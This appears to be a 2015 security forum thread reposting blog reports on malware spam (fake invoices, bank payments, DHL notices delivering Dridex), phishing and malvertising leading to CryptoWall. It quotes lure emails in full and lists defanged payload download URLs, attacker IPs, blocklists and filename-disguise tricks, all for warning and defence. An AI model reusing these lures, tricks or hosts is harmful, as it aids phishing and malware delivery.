SPAM frauds, fakes, and other MALWARE deliveries...

[AplusWebMaster]

FYI...

Fake 'Bank payment' SPAM – PDF malware
- http://myonlinesecurity.co.uk/bank-p...k-pdf-malware/
8 June 2015 - "'Bank payment' pretending to come from sarah@ hairandhealth .co.uk with a pdf attachment is another one from the current bot runs... This email contains a genuine PDF which has embedded scripts that will infect you. So far none of the automatic analysis tools can find any malicious content but it is trying to send multicast messages...
Update: An automatic analysis by Payload security* gives the download location as hundeschulegoerg .de/15/10.exe ( VirusTotal**)... Adobe reader in -recent- versions has Protected view automatically -enabled- and unless you press-the-button to 'enable all features', you should be safe from this attack... make sure you -uncheck- -any- additional offerings of security scans/Google chrome or -toolbars- that it wants to include in the download:
> http://myonlinesecurity.co.uk/wp-con...4-1024x423.png
The email (which has random amounts) looks like:
Dear client
Please find attached a bank payment for £3033.10 dated 10th June 2015
to pay invoice 1757. With thanks.
Kind regards
Sarah
Accounts

Todays Date: Bank payment 100615.pdf - Current Virus total detections: 2/57***
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.hybrid-analysis.com/samp...nvironmentId=2

** https://www.virustotal.com/en-gb/fil...is/1433753588/
... Behavioural information
TCP connections
146.185.128.226: https://www.virustotal.com/en-gb/ip-...6/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-...0/information/

*** https://www.virustotal.com/en-gb/fil...is/1433751824/

hundeschulegoerg .de: 212.40.179.111: https://www.virustotal.com/en-gb/ip-...1/information/

- http://blog.dynamoo.com/2015/06/malw...k-payment.html
8 June 2015
"... Recommended blocklist:
146.185.128.226
31.186.99.250
176.99.6.10
203.151.94.120
185.12.95.40 "

[AplusWebMaster]

FYI...

Fake 'Invoice' SPAM - PDF malware
- http://myonlinesecurity.co.uk/re-inv...e-pdf-malware/
9 June 2015 - "'Re: Invoice' coming from random senders and random email addresses with a semi random zip attachment the zip is always called 'invoice(random number).zip' is another one from the current bot runs... other emails today pretending to come from RBC Express <ISVAdmin@ rbc .com> with a subject of 'invoices', along with a 'Lloyds Bank – Pendeford Securities – Please Read Action Required/PI Documents/ Region code East 2/ 4084583/'. These 2 have a different malware payload (VirusTotal*)... The email looks like:

Check Invoice number

9 June 2015: Invoice (42).zip: Extracts to: Invoice_store.exe - Current Virus total detections: 2/57**
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/fil...is/1433843143/
... Behavioural information
TCP connections
64.182.208.183: https://www.virustotal.com/en-gb/ip-...3/information/
188.120.194.101: https://www.virustotal.com/en-gb/ip-...1/information/
216.254.231.11: https://www.virustotal.com/en-gb/ip-...1/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-...0/information/
188.120.194.101: https://www.virustotal.com/en-gb/ip-...1/information/

** https://www.virustotal.com/en-gb/fil...is/1433843556/
___

Fake 'Password Confirmation' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/passwo...sheet-malware/
9 June 2015 - "'Password Confirmation [742263403307] T82' pretending to come from steve.tasker81@ thomashiggins .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email (which has random numbers in the subject) looks like:

Full document is attached

09 June 2015: 1913.doc - Current Virus total detections: 2/57*
... which connects to and downloads a Dridex banking malware from speakhighly .com/42/11.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/fil...is/1433841783/

** https://www.virustotal.com/en-gb/fil...is/1433842088/
... Behavioural information
TCP connections
173.230.130.172: https://www.virustotal.com/en-gb/ip-...2/information/
5.178.43.48: https://www.virustotal.com/en-gb/ip-...8/information/

speakhighly .com: 77.73.6.74: https://www.virustotal.com/en-gb/ip-...4/information/

- http://blog.dynamoo.com/2015/06/malw...firmation.html
9 June 2015
"... Recommended blocklist:
173.230.130.172
94.23.53.23
31.186.99.250 "
___

Fake 'Unpaid invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/unpaid...sheet-malware/
9 June 2015 - "'Unpaid invoice' pretending to come from Debbie Spencer <Debbie@ burgoynes-lyonshall .co .uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Hi
Could you let me know when the attached will be paid?
Many thanks
Debbie
Deborah Spencer
Company Accountant
Burgoynes (Lyonshall) Ltd
Lyonshall
Kington
Herefordshire HR5 3JR
01544 340283 ...

The malware in this email is exactly the -same- as described in today’s earlier malspam run with word docs 'Password Confirmation [742263403307] T82 – word doc or excel xls spreadsheet malware'*... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/passwo...sheet-malware/
___

The HTTPS-Only Standard
- https://https.cio.gov/
___

Beware of Emails Bearing Gifts
- http://www.darkreading.com/partner-p...a/d-id/1320769
6/9/2015 - "Crime gangs are building very legitimate-looking emails as cover for phishing and ransomware, and they are having enough success that the attacks are escalating. In the first quarter of 2015, McAfee Labs registered a 165% increase in new ransomware driven largely by the new, hard-to-detect CTB-Locker ransomware family, new ransomware families such as Teslacrypt and TOX, and the emergence of new versions of CryptoWall, TorrentLocker, and BandarChor. Dell Secureworks* believes the ransomware business truly pays, with CryptoWall reaching at least 1 million victims and collecting about $1.8 million in ransom. The growth of ransomware is likely to continue to surge given the rise of new “business models,” the growing availability and ease of operation of newer ransomware kits, and the general increase in tactical sophistication. For instance, CTB-Locker possesses clever techniques for evading security software, higher-quality phishing emails, and an “affiliate” program that offers accomplices a percentage of ransom payments in return for flooding cyberspace with CTB-Locker phishing messages. In the case of TOX, ransomware is going the way of other malware, delivered in turnkey ransomware packages, simplifying the development, launch, and ongoing operation of ransomware campaigns. And where fewer technical skills are required, you have an increase of less-skilled perpetrators getting into a cybercrime business... Phishing and ransomware attacks are hardly new, but the rapid changes in malware code and the legitimate-looking emails are making it harder for both users and antivirus programs to detect the surprise waiting at the other end of the link. No single security solution provides an adequate defense. When malware can sneak through a network firewall, lie low to trick a sandbox, and evade endpoint antivirus, a thorough defense requires the combined resources of a security-connected framework."
* http://www.secureworks.com/cyber-thr...reat-analysis/
___

Flash malware jumps over 300 percent - Q1-2015
- http://www.theinquirer.net/inquirer/...uarter-of-2015
Jun 09 2015 - "MALWARE ATTACKS on the Adobe Flash platform rose by a horrifying 317 percent in the first quarter of 2015. New figures in the McAfee Labs Threats Report May 2015 (PDF*) show that the number of recorded Flash malware instances was almost 200,000 in Q1 2015, compared with 47,000 in Q4 2014...
* http://www.mcafee.com/us/resources/r...at-q1-2015.pdf
Spam continues ever onward with six trillion messages sent in Q1. A total of 1,118 spam domains were discovered in the UK alone, beating Russia (1,104) and Japan (1,035). Phishing domains hit 887 in the UK, compared with France (799) and the Netherlands (680). Overall, McAfee Labs observed 362 phishing attacks a minute, or six every second..."

[AplusWebMaster]

FYI...

Fake 'BTT telephone bill' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/your-m...sheet-malware/
10 Jun 2015 - "'Your monthly BTT telephone bill' pretending to come from Hayley Sweeney <admins@ bttcomms .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:

Please find attached your telephone bill for last month. This message was sent automatically.
For any queries relating to this bill, please contact Customer Services on 01536 211100.

10 June 2015 : Invoice_68362.doc - Current Virus total detections: 5/57*
... Which downloads a Dridex banking malware from www .jimaimracing .co.uk/64/11.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/b...is/1433931273/

** https://www.virustotal.com/en/file/3...is/1433932505/

jimaimracing .co.uk: 91.194.151.37: https://www.virustotal.com/en/ip-add...7/information/

- http://blog.dynamoo.com/2015/06/malw...y-sweeney.html
10 June 2015
"... Recommended blocklist:
173.230.130.172
94.23.53.23
176.99.6.10 "

[AplusWebMaster]

FYI...

Fake 'order reference' SPAM - PDF malware
- http://myonlinesecurity.co.uk/your-o...e-pdf-malware/
11 Jun 2015 - "'Your order reference is 05806' pretending to come from inform <john.wade@ precisionclubs .com> with a zip attachment is another one from the current bot runs... The email looks like:
Dear client,
Thank you for the order,
your credit card will be charged for 312 dollars.
For more information, please visit our web site ...
Best regards, ticket service.
Tel./Fax.: (828) 012 88 840

11 June 2015: payment_n09837462_pdf.zip:
Extracts to: payment_n09837462_pdf_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _.exe
Current Virus total detections: 5/57*. Note the series of _ after the pdf. That is designed to try to fool you into thinking that the .exe file is a pdf so you open it. Most windows computers won’t show the .exe in windows explorer if enough spaces or _ are inserted. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/fil...is/1434002812/
___

Fake 'New_Order' email / Phish...
- http://blog.dynamoo.com/2015/06/phis...tructions.html
11 Jun 2015 - "I've seen a few of these today, presumably they aren't quite spammy enough to get blocked by our mail filters.. The attachment is New_Order_#056253_Hf_Constructions.pdf which looks like a purchase order, but there is a blurred out section:
Screenshot: https://4.bp.blogspot.com/-4adKeKIur.../s640/hf-1.jpg

An examination of the underlying PDF file shows two URLs... In turn these redirect... The second URL listed 404s, but the first one is active. According to the URLquery report*, it looks harmless, just leading to a phishing page. But when I tried it in a test environment, the behaviour was somewhat different and it also attempted to load a page... This page 404s, but was previously hosted on a bad server at 92.222.42.183 [VT report**]. That server has been offline for a few days, but the URL is suggestive of an exploit kit of some sort. The "megatrading .hol.es" (hosted on 31.220.16.16 by Hostinger - VT report***) landing page looks like a straightforward phish:
Screenshot: https://4.bp.blogspot.com/-lsN0K-Cu2.../s640/hf-2.png

Entering the username and password always seems to return an error, even if you are absolutely certain the combination are correct:
> https://2.bp.blogspot.com/-R9BG4uiZ_.../s320/hf-3.png
I suspect that all this portion is doing is collecting email addresses and passwords for use later. Webmail accounts have some value to the bad guys, and of course many people re-use passwords all over the place, so it could be used as a way to get access to other services. Take care.
Recommended blocklist:
31.220.16.16
92.222.42.183 "

* http://urlquery.net/report.php?id=1434011774093

** https://www.virustotal.com/en/ip-add...3/information/

*** https://www.virustotal.com/en/ip-add...6/information/
___

Mystery continues to surround the nude celebrity iCloud hack
- http://www.hotforsecurity.com/blog/m...ack-11990.html
June 11, 2015 - "Sure, companies and governments get hacked all the time. But for the mainstream media to *really* take an interest, you need to add a twist of celebrity (preferable nude and female). That’s what happened last year when the so-called 'Fappening' saw the intimate and private photographs of scores of female celebrities and actresses, many of them topless or nude, leak onto 4Chan and the seedier corners of Reddit. Famous names who had their privacy violated by the leak included Jennifer Lawrence, Kate Upton, Victoria Justice, Kirsten Dunst, Hope Solo, Krysten Ritter, Yvonne Strahovski, Teresa Palmer, Ariana Grande, and Mary Elizabeth Winstead, amongst many others... According to Gawker has revealed a search warrant and affidavit, revealing that the FBI has seized computers belonging to a Chicago man in connection with the hack. And it appears that the documents back Apple’s claim that their iCloud service did -not- suffer a breach as such, but instead was the victim of a targeted attack after celebrities’ passwords and security questions were determined. In the affidavit, FBI cybercrime special agent Josh Sadowsky says that an IP address assigned to one Emilio Herrera was “used to access approximately 572 unique iCloud accounts” between May 13 2013 and August 31 2014. According to the statement, a number of the accounts accessed belonged to celebrities who had photos leaked online. In all, iCloud accounts were accessed -3,263- times from the IP address. In addition, the IP address was used from a computer running Windows 7 to reset -1,987- unique iCloud account passwords. Unsurprisingly, law enforcement officers visited Herrera’s house in Chicago and walked away with computers, phones, SD cards, and other devices that no doubt they planned to submit to forensic scrutiny. In particular they would be interested in uncovering any evidence of activity which might suggest phishing, the usage of hacking tools or email forwarding. But here’s where things get interesting. According to Gawker, Herrera has -not- been charged with any crime and is not even considered a suspect at this point. It would certainly be surprising if someone involved in such an industrial-scale account hijacking operation would not have taken elementary steps to hide their true IP address, so is it possible that Herersa’s computers were being used by the hackers of nude celeb’s iCloud accounts -without- Hererra’s knowledge or permission? If that is the case, then it’s yet another reason why all computer users need to learn the importance of proper computer security. Keeping your computer protected with a layered defence and patched against the latest vulnerabilities reduces the chance of a remote-hacker gaining control of your PC. Because the very last thing you want is to be implicated in a crime that you didn’t commit, because hackers have been able to commandeer your computer for their own evil ends."
- Graham Cluley

[AplusWebMaster]

FYI...

Fake 'Confirmation transfer' SPAM - PDF malware
- http://myonlinesecurity.co.uk/hsbc-c...e-pdf-malware/
12 June 2015 - "'Confirmation of the transfer' pretending to come from HSBC (random name@random email address) with a zip attachment is another one from the current bot runs... The email looks like:
Transfer:
Number of Transfer: 359880-67692630-94464
To: [redacted]
Bank sender: HSBS
Country Poster: England
City Poster: London

12 June 2015: transfer-England-359880-67692630-94464.zip(random numbers):
Extracts to: New_docs.exe - Current Virus total detections: 4/57*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/fil...is/1434111878/
... Behavioural information
TCP connections
64.182.208.183: https://www.virustotal.com/en-gb/ip-...3/information/
188.120.194.101: https://www.virustotal.com/en-gb/ip-...1/information/
24.19.25.40: https://www.virustotal.com/en-gb/ip-...0/information/
88.221.14.249: https://www.virustotal.com/en-gb/ip-...9/information/
___

Malvertising 'Pop-under ads' lead to CryptoWall
- https://blog.malwarebytes.org/malver...ryptowall-3-0/
June 11, 2015 - "... malvertising leverages the infrastructure provided by ad networks to distribute malicious content to end users while they browse the Internet... a prolific ad network (over 180M hits/month according to SimilarWeb) being used by online fraudsters to distribute malware and other nuisances. 'Popcash' is a pop-under ad network that offers services for both publishers and advertisers: https://blog.malwarebytes.org/wp-con...opcashlogo.png
'Pop-under ads are similar to pop-up ads, but the ad window appears -hidden- behind the main browser window rather than superimposed in front of it... They usually remain -unnoticed- until the main browser window is closed or minimized, leaving the user’s attention free for the advertisement... users therefore react 'better' to pop-under advertising than to pop-up advertising because of this different, delayed 'impression'. — Wikipedia**
** https://en.wikipedia.org/wiki/Pop-up_ad#Pop-under_ads
... In this case, we received a URL used as a gate to an exploit kit:
> https://blog.malwarebytes.org/wp-con...edirection.png
The Magnitude EK starts with a simplified landing page that contains the code to launch a Flash exploit and an iframe to perform an Internet Explorer exploit... The Flash exploit (VT)[3] is CVE-2015-3090 as reported on malware.dontneedcoffee[4]:
3] https://www.virustotal.com/en/file/0...is/1434044838/
4] http://malware.dontneedcoffee.com/20...00169-and.html
... The Internet Explorer exploit (CVE-2014-6332 or CVE-2013-2551 thanks @kafeine) is prepared via a heavily encoded piece of JavaScript... Several URLs are loaded but only a couple actually loaded the same binary (VT)[5] detected by Malwarebytes Anti-Malware as Trojan.Dropper.Necurs, which eventually loads CryptoWall 3.0... other slots are available and could be filled with different malware families by the exploit kit operator...
5] https://www.virustotal.com/en/file/5...is/1434001814/
... CryptoWall 3.0: Magnitude EK, just like many other exploit kits recently, is pushing crypto ransomware, possibly one of the worst strains of malware because it uses genuine encryption to lock down a user’s personal files. Soon after the ransomware takes over the PC, it will prompt a message warning of what just happened and giving details on how to proceed:
> https://blog.malwarebytes.org/wp-con...LP_DECRYPT.png
In this case, one needs to pay $500 to get their files back within the deadline, otherwise that amounts doubles:
> https://blog.malwarebytes.org/wp-con...2015/06/BT.png
Conclusions: Because malvertising involves multiple players in order to work (publishers, ad networks, visitors) each has its own role to play in combatting this problem. Publishers (should) be wise in choosing their third-party advertisers by choosing reputable ones (although it is not a 100% guarantee (nothing is) that incidents will not happen). Ad networks can and should also ensure that the traffic they serve is clean. We contacted Popca$h on two separate occasions through their official “report malware” page, but -never- received a response... The campaign is still -ongoing- and not only serving exploits but -also- tech support scams[6] customized for your browser, ISP, city, etc:
6] https://blog.malwarebytes.org/wp-con...06/warning.png "
(More detail at the malwarebytes URL at the top of this post.)

- http://windowssecrets.com/patch-watc...ffice-updates/
June 11, 2015 - "... Flash Player 18.0.0.160 addresses 13 vulnerabilities, some of which have already been used in ransomware attacks..."

[AplusWebMaster]

FYI...

Fake 'Payment Confirmation' SPAM - doc/xls malware
- http://blog.dynamoo.com/2015/06/malw...firmation.html
15 Jun 2015 - "This fake financial spam does not come from Reed, but is instead a simple forgery with a malicious attachment:
From: reed .co.uk Credit Control [mailto:creditcontrol.rol@ reed .co.uk]
Sent: Monday, June 15, 2015 11:10 AM
Subject: Payment Confirmation 29172230
Dear Sirs,
Many thanks for your card payment. Please find payment confirmation attached below.
Should you have any queries, please do not hesitate to contact Credit Control Team on 0845 241 9293.
Kind Regards
Credit Control Team
T: 020 7067 4584
F: 020 7067 4628
Email: creditcontrol.rol@ reed .co.uk

The only sample I have seen so far has an attachment 29172230_15.06.15.doc [detection rate 3/57*] which contains this malicious macro... which downloads a component from the following location:
http ://www .freewebstuff .be/34/44.exe
This is saved as %TEMP%\ginkan86.exe and has a VirusTotal detection rate of 6/57**. There will probably be other download locations, but they should all lead to an identical binary. Automated analysis tools... show traffic to the following IPs:
136.243.14.142 (Hetzner, Germany)
71.14.1.139 (Charter Communications, US)
173.230.130.172 (Linode, US)
94.23.53.23 (OVH, France)
176.99.6.10 (Global Telecommunications Ltd, Russia)
According the this Malwr report[3], it also drops a Dridex DLL with a detection rate of 18/57[4].
Recommended blocklist:
136.243.14.142
71.14.1.139
173.230.130.172
94.23.53.23
176.99.6.10 "
* https://www.virustotal.com/en/file/b...is/1434362701/

** https://www.virustotal.com/en/file/0...is/1434362861/

3] https://malwr.com/analysis/NDI1OGY0N...A0YzFlMzk2MDA/

4] https://www.virustotal.com/en/file/0...is/1434362861/

freewebstuff .be: 46.21.172.135: https://www.virustotal.com/en-gb/ip-...5/information/

- http://myonlinesecurity.co.uk/paymen...sheet-malware/
15 Jun 2015
Screenshot: http://myonlinesecurity.co.uk/wp-con...nfirmation.png
> https://www.virustotal.com/en-gb/fil...is/1434364970/
___

Fake 'Nyfast Payment' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/nyfast...sheet-malware/
15 Jun 2015 - "'[Nyfast] Payment accepted' pretending to come from Nyfast <sales@ nyfast .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...

Screenshot: http://myonlinesecurity.co.uk/wp-con.../06/nyfast.png

15 June 2015: 101153.doc - Current Virus total detections: 3/57*
... Which connects to and downloads Dridex banking malware from http ://webbouw .be/34/44.exe ( VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/fil...is/1434364039/

** https://www.virustotal.com/en-gb/fil...is/1434362861/

webbouw .be: 46.21.172.135: https://www.virustotal.com/en/ip-add...5/information/
___

Fake 'PI-ORDER' SPAM – PDF malware
- http://myonlinesecurity.co.uk/pi-ord...e-pdf-malware/
15 Jun 2015 - "'PI-ORDER' with a zip attachment pretending to come from suiming <suiminggroup@ cs .ename .net> is another one from the current bot runs... The email looks like:
Dear Sir/madam,
Find attached our purchase order. Kindly quote us best price and send us proforma invoice asap, so that we can proceed with the necessary payment.kindly confirm the PO and send PI asap.
kind Regards
suiming Group

15 June 2015: PI-ORDER.zip: Extracts to: PI-ORDER.exe - Current Virus total detections: 9/57*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/fil...is/1434339886/
___

Fake 'New Doc' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/will-k...sheet-malware/
15 Jun 2015 - "'Will Kinghan henryhowardfinance .co .uk New Doc' pretending to come from Will Kinghan <WKinghan@hhf .uk .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...

Screenshot: http://myonlinesecurity.co.uk/wp-con...ll-kinghan.png

15 June 2015 : New doc.doc ... which is the -same- malware as described in today’s other word doc malspam runs Payment Confirmation reed .co .uk Credit Control* – word doc or excel xls spreadsheet malware and [Nyfast] Payment accepted** – word doc or excel xls spreadsheet malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* http://myonlinesecurity.co.uk/paymen...sheet-malware/

** http://myonlinesecurity.co.uk/nyfast...sheet-malware/
___

'Let us help you make your online banking with HSBC more secure' - PHISH
- http://myonlinesecurity.co.uk/let-us...cure-phishing/
15 Jun 2015 - "An email saying 'Let us help you make your online banking with HSBC more secure' is one of today’s -phishing- attempts. There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying some thing like:
- There have been unauthorised or suspicious attempts to log in to your account, please verify
- Your account has exceeded its limit and needs to be verified
- Your account will be suspended !
- You have received a secure message from < your bank>
- We are unable to verify your account information
- Update Personal Information
- Urgent Account Review Notification
- We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
- Confirmation of Order

... It will NEVER be a genuine email from PayPal or Your Bank so don’t ever fill in the html (webpage) form that comes attached to the email. Some versions of this phish will have a link to a website that looks at first glance like the genuine bank website. That is also false... The link in the email directs you to a -fake- site, if you look at the fake website, you would be very hard-pressed to tell the difference from the fake one and the genuine site. The -only- way is look at the address bar and in the Genuine PayPal site, when using Internet Explorer the entire address bar is in green (in Chrome or Firefox, only the padlock symbol on the left of the browser is green):
>> http://myonlinesecurity.co.uk/wp-con...phish_site.png
... luckily the phishing site has been deactivated by the webhosts, but be careful and remember that banks don’t send emails saying 'follow-the-link' to change anything..."
___

Fake 'Notice DHL' SPAM - PDF malware
- http://myonlinesecurity.co.uk/hsbc-n...e-pdf-malware/
15 Jun 2015 - "'Notice DHL' pretending to come from HSBC (random name @ random email address) with a zip attachment is another one from the current bot runs... The waybill number is random in each email but -matches- the attachment name. The email looks like:
Notice DHL
Courier our company was unable to deliver the goods.
CAUSE: was lost your number
Delivery Status: Active
Services: delivery in one day
Waybill number for your cargo: WL4OY-k5qvML-0136
Special sticker attached to the letter. Print sticker and show it in your post office.

15 June 2015: Sticker-WL4OY-k5qvML-0136.zip: Extracts to: New_docs.exe
Current Virus total detections: 1/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/fil...is/1434373340/

[AplusWebMaster]

FYI...

Magnitude Exploit Kit uses Newly Patched Adobe Vuln ...
- http://blog.trendmicro.com/trendlabs...-most-at-risk/
Jun 16, 2015 - "Adobe may have already patched a Flash Player vulnerability last week, but several users — especially those in the US, Canada, and the UK — are still currently exposed and are at risk of getting infected with CryptoWall 3.0. The Magnitude Exploit Kit included an exploit, detected as SWF_EXPLOIT.MJTE, for the said vulnerability, allowing attackers to spread crypto-ransomware into their target systems. We first saw signs of this activity yesterday, June 15... Adobe’s regular June Update for Adobe Flash Player... upgraded the software to version 18.0.0.160*. However, many users are still running the previous version (17.0.0.188), which means that a lot of users are still at risk... cybercriminals rapidly take advantage of recently-patched vulnerabilities through exploit kits. We saw a similar incident in March, where exploits for an Adobe Flash Player vulnerability were added to the Nuclear Exploit Kit just a week after the patch was released. We also noted earlier this month that Flash Player was being targeted more frequently by exploit kits, and that shows no sign of changing soon..."
* https://www.adobe.com/products/flash...ribution3.html
___

Fake 'Travel order' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/the-ca...sheet-malware/
16 Jun 2015 - "'Travel order confirmation 0300202959' pretending to come from overseastravel@ caravanclub .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear customer,
Thank you for your travel order.
Please find attached your booking confirmation which you should take with you on your trip. Please note we no longer send tickets for overseas travel bookings.
Your booking confirmation document is stored as a DOC file which requires the use of Microsoft Word software to view it.
Yours sincerely
The Caravan Club
This email is sent from the offices of The Caravan Club, a company limited by guarantee (Company Number: 00646027). The registered office is East Grinstead House, London Road, East Grinstead, West Sussex, RH19 1UA.
Regulation The Caravan Club Ltd is authorised and regulated by the Financial Conduct Authority. FCA registration number is 311890
This email is sent from the offices of The Caravan Club Limited...

16 June 2015: Travel Order Confirmation – 0300202959.doc
Current Virus total detections: 4/57* ... downloads Dridex banking malware from aspectaceindia .in/90/72.exe (VirusTotal**). Note: there are normally 5 or 6 other download locations but all will lead to same Dridex banking malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/fil...is/1434440780/

** https://www.virustotal.com/en-gb/fil...is/1434441238/
... Behavioural information
TCP connections
37.143.11.165: https://www.virustotal.com/en-gb/ip-...5/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-...0/information/

aspectaceindia .in: 203.124.96.148: https://www.virustotal.com/en-gb/ip-...8/information/
___

Fake 'Invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/carol-...sheet-malware/
16 Jun 2016 - "'Invoice' pretending to come from Carol Young <carol@ baguette-express. co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Invoice Attached
Carol Young
Accounts Manager
Office:0845 070 4360
Email: carol@ baguette-express .co.uk
Web: www .baguette-express .co.uk
1 Cranston Crescent
Lauder
Borders
TD2 6UB

16 June 2015: A4 Inv_Crd Unit Price, With Discount.doc - Current Virus total detections: 4/57*
... downloads Dridex banking malware from dubrovnik-marryme .com/90/72.exe (VirusTotal**) This is the -same- malware payload as described in today’s other malspam word macro malware 'The caravan Club Travel order confirmation 0300202959'*** – word doc or excel xls spreadsheet malware..."
* https://www.virustotal.com/en-gb/fil...is/1434441322/

** https://www.virustotal.com/en-gb/fil...is/1434441238/
... Behavioural information
TCP connections
37.143.11.165: https://www.virustotal.com/en-gb/ip-...5/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-...0/information/

*** http://myonlinesecurity.co.uk/the-ca...sheet-malware/

dubrovnik-marryme .com: 188.40.57.166: https://www.virustotal.com/en-gb/ip-...6/information/
___

Fake 'Invoice copy' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/gary-a...sheet-malware/
16 Jun 2015 - "'Invoice copy no. 252576' pretending to come from kathy@ almondscateringsupplies .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please find attached DOC document with invoice copy no. 252576
Kind regards,
Gary Almond

16 June 2015 : DespatchNote_-_252576_160615_063107663.doc - Current Virus total detections: 4/57*
... downloads Dridex banking malware from aspectaceindia .in/90/72.exe (VirusTotal**)
Note: there are normally 5 or 6 other download locations but all will lead to same Dridex banking malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/fil...is/1434440780/

** https://www.virustotal.com/en-gb/fil...is/1434441238/
... Behavioural information
TCP connections
37.143.11.165: https://www.virustotal.com/en-gb/ip-...5/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-...0/information/

aspectaceindia .in: 203.124.96.148: https://www.virustotal.com/en-gb/ip-...8/information/
___

Fake 'Internet Invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/eclips...sheet-malware/
16 Jun 2015 - "'Eclipse Internet Invoice is available online – 36889843EC' pretending to come from customer@ eclipse .net.uk with a malicious word doc called EC_36889843_88113463.doc is another one from the current bot runs... The email looks like:
Dear Customer,
Thank you for choosing to receive your invoice by email. Please find this attached.
If you would like to change any of your billing options, please log in to My Eclipse using your registration email and password... Alternatively, you can contact our Customer Service Team, Monday to Friday 8am – 6pm, on the telephone number published...
Kind regards
Eclipse Internet

The number in the subject which is random -matches- the word attachment name, so everybody gets a different named email and attachment. The malicious macro and the downloaded Dridex banking malware is exactly the -same- as described in today’s earlier other word macro malspam runs:

1]'Gary Almond almondscateringsupplies .co.uk Invoice copy no. 252576 – word doc or excel xls spreadsheet malware':
- http://myonlinesecurity.co.uk/gary-a...sheet-malware/

2]'Carol Young baguette-express Invoice – word doc or excel xls spreadsheet malware':
- http://myonlinesecurity.co.uk/carol-...sheet-malware/

3]'The caravan Club Travel order confirmation 0300202959 – word doc or excel xls spreadsheet malware':
- http://myonlinesecurity.co.uk/the-ca...sheet-malware/
The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
___

Trojan uses steganography to hide itself in image files
- http://net-security.org/malware_news.php?id=3058
16.06.2015 - "The Dell SecureWorks* CTU research team has recently analyzed a piece of malware that uses digital steganography to hide part of its malicious code. Stegoloader, as they dubbed it, is not technically new. Previous versions of the malware have been spotted in 2013 and 2014, bundled with tools used to crack or generate software keys... Stegoloader's main reason of being is to steal information from users, but it has a modular design, and the researchers themselves say that they might not have yet seen and analyzed all of its modules... Stegoloader is not the first malware to use steganography to hide malicious code or information such as the address of the malware's backup C&C, but the researchers note that it could represent an emerging trend in malware... researcher Saumil Shah recently demonstrated at the Hack in the Box conference**, it's possible to insert both malicious code and exploit code that will trigger it into an image, and this type of delivery mechanism is still undetectable by current defensive solutions."
* http://www.secureworks.com/cyber-thr...ation-stealer/

** http://www.net-security.org/secworld.php?id=18443
___

Dutch Users: victims of Large Malvertising Campaign
- https://blog.malwarebytes.org/malver...sing-campaign/
June 15, 2015 - "Security firm Fox-IT* has identified a large malvertising campaign that began affecting Dutch users on June 11:
* http://blog.fox-it.com/2015/06/15/la...e-netherlands/
In their blog post, they say that several major news sites were loading the -bogus- advertisement that ultimately lead to the Angler exploit kit. Looking at our telemetry we also noticed this attack, and in particular on Dutch news site Telegraaf[.]nl via an advert from otsmarketing .com, which according to Fox-IT is -more- than a suspicious ad network:
> https://blog.malwarebytes.org/wp-con...06/diagram.png
